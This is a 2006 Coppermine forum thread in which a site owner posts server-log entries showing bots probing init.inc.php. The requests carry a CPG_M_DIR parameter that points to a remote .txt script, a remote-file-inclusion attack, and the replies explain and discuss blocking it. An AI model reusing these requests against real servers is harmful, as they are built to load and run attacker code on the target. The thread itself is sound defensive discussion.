Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: someone probing for coppermine init.inc.php  (Read 17823 times)

0 Members and 1 Guest are viewing this topic.

imrich

  • Tester
  • Coppermine regular visitor
  • *
  • Offline Offline
  • Gender: Male
  • Posts: 70
someone probing for coppermine init.inc.php
« on: November 06, 2006, 10:45:20 pm »

I found a bunch of entries in my server log file that were strange.

It looks like someone is probing for init.inc.php data:

202.143.135.34 - - [06/Nov/2006:08:31:27 -0500] "GET /coppermine/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://molganinovo.ru/c.php.txt? HTTP/1.1" 404 745 "-" "libwww-perl/5.79"
202.143.135.34 - - [06/Nov/2006:08:31:28 -0500] "GET /coppermine/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://molganinovo.ru/c.php.txt? HTTP/1.1" 404 745 "-" "libwww-perl/5.79"
202.69.231.96 - - [06/Nov/2006:08:33:09 -0500] "GET /coppermine/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://molganinovo.ru/c.php.txt? HTTP/1.1" 404 745 "-" "libwww-perl/5.65"
202
72.5.54.40 - - [06/Nov/2006:09:41:11 -0500] "GET /coppermine/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://molganinovo.ru/c.php.txt? HTTP/1.1" 404 745 "-" "libwww-perl/5.65"
65

Is anyone else seeing this sort of probes from time to time?

I only saw this because I had a bunch of "file does not exist" for init.inc.php in my apache error log, which I thought was strange.
« Last Edit: November 07, 2006, 03:18:22 pm by GauGau »
Logged

donnoman

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 1615
  • From donovanbray.com
    • Donovan Bray
Re: someone probing for coppermine init.inc.php
« Reply #1 on: November 07, 2006, 04:55:00 am »

it appears they are seeking the nuke port of coppermine, which we don't support and is known to have some serious security weaknesses.


http://forum.coppermine-gallery.net/index.php?topic=5879.0
Logged

imrich

  • Tester
  • Coppermine regular visitor
  • *
  • Offline Offline
  • Gender: Male
  • Posts: 70
Re: someone probing for coppermine init.inc.php
« Reply #2 on: November 07, 2006, 03:15:56 pm »

Thanks for the reply. I'm not running nuke, so it's good to know that I should be ok.
Logged

kegobeer

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 4637
  • Beer - it does a body good!
    • The Kazebeer Family Website
Re: someone probing for coppermine init.inc.php
« Reply #3 on: November 08, 2006, 03:05:22 am »

I get those same IP addresses on my site.  I block those IP addresses in my .htaccess file, along with any requests for /modules/.
Logged
Do not send me a private message unless I ask for one.  Make your post public so everyone can benefit.

There are no stupid questions
But there are a LOT of inquisitive idiots
Pages: [1]   Go Up
 

Page created in 0.017 seconds with 20 queries.